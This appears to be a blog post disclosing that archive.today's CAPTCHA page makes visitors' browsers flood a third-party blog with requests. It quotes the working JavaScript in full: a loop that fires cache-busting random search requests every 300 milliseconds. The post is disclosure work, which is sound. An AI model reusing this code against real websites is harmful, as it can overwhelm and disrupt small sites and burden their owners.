Archive.today CAPTCHA Code Triggers DDoS-Style Traffic Against a Blog

Archive.today CAPTCHA Code Triggers DDoS-Style Traffic Against a Blog

Archive.today CAPTCHA Code Triggers DDoS-Style Traffic Against a Blog

Published 2026 · Web Security · DDoS Investigation
⚠️ WARNING: Evidence shows sustained automated traffic capable of overwhelming small websites.

An investigation has revealed that archive.today runs client-side JavaScript on its CAPTCHA page that repeatedly sends requests to a third-party blog. When left open, this behavior generates traffic patterns consistent with a DDoS-style attack.

This is not speculation. The code executes automatically in a visitor’s browser and fires requests roughly every 300 milliseconds. For small or independent blogs, this level of sustained traffic can cause slowdowns, service disruption, or downtime.

Observed JavaScript Behavior

setInterval(function() {
  fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
    referrerPolicy: "no-referrer",
    mode: "no-cors"
  });
}, 300);

In simple terms: while the CAPTCHA page is open, the browser repeatedly contacts the target blog with random search requests. These requests bypass caching and continue nonstop.

Screenshots & Evidence

Why This Matters

This incident demonstrates how client-side code can unintentionally — or negligently — turn ordinary users into traffic sources for an attack. For independent site owners, this type of traffic can be financially and operationally damaging.

Primary Source

Original Investigation – Gyrovague
This site documents web archive abuse and DDoS-style incidents for awareness and protection.

Comments

Post a Comment